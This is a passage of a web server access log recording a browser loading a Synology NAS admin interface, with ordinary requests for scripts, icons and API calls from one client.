AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileSharing/FileSharing.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemStatusChecker/SystemStatusChecker.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadUtil.js?v=1.3.4-1404&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6974] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/PollingTask.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PortEnable/PortEnable.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2571] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/core.js?v=2.7.2-2464&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1900] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/ActiveInsightUpdateNotify.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/DisableAdminNotification.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/EnableNewUpdateSetting.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2986] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/EjectableDeviceList.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 3055] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_fbext.js?v=3.2.1-23280&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1817] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/directory-admin-list-dialog.js?v=4.15.9-0644&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 3025] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/smb-tab.js?v=4.15.9-0644&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 14997] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/MailTaskTray.js?v=1.3.4-1404&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 17628] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_selector.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotify.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 5758] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 51689] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskGrid.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1711] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/PermissionDialog.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 19733] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_component.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 3604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/tinymce.min.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 299542] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/dscs_package.js?v=2.7.2-2464&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 69138] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-options-dialog.js?v=4.15.9-0644&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1350] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.DisableAdmin" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/core.js?v=3.2.1-23280&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6932] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_bt_setting.png?v=64a2b619c83e2d218cfc213dfca3d082" [Client 84.1.26.27] [Length 1543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskTray.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/CustomColumn.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_wizard.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 41851] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCEVue.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 5714] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 186] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Upgrade" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_launch.png?v=35914986444b1f36b0d98a60cf9d1b7f" [Client 84.1.26.27] [Length 539] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_recent.png?v=0072a433b9598a0df7d69693eda96c65" [Client 84.1.26.27] [Length 543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_pause.png?v=1c5da687c4ba047de83d53cf0c9b8faf" [Client 84.1.26.27] [Length 173] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/desktop_index_tray.js?v=3.2.1-23280&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadMonitor.js?v=1.3.4-1404&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6258] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/app_tray.js?v=3.2.1-23280&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2818] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/tray_icon/1x/overview_status_drive_index.png" [Client 84.1.26.27] [Length 5198] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/combo_trigger.png?v=8710c149eda822e2cea65d04294fe3b4" [Client 84.1.26.27] [Length 446] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/tray_icon/1x/icn_thumbnail_converter.png" [Client 84.1.26.27] [Length 476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/admin_center.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 423009] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_pause.png" [Client 84.1.26.27] [Length 173] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_folder.png" [Client 84.1.26.27] [Length 216] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_recent.png" [Client 84.1.26.27] [Length 543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/menu_arrow_r.png?v=8fbae554c9026f62d469474ba885fab0" [Client 84.1.26.27] [Length 420] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_launch.png" [Client 84.1.26.27] [Length 586] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/C2FS.js?v=1.3.2-1037&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 164398] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 353] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/wdgt_icn_tray_cloud_sync_done.png?v=45d0095da5a965199220e140d577ef68" [Client 84.1.26.27] [Length 2699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[16/Jan/2026:11:11:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cate_status.png?v=bb521cb3ed4dfaadf7f091d461a6ea00" [Client 84.1.26.27] [Length 2471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Foto.UserInfo" [Client 84.1.26.27] [Length 276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 240] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 28340] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 194] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3569] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 190] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:48 +0000] - 200 200 - POST https nas.profibot.hu 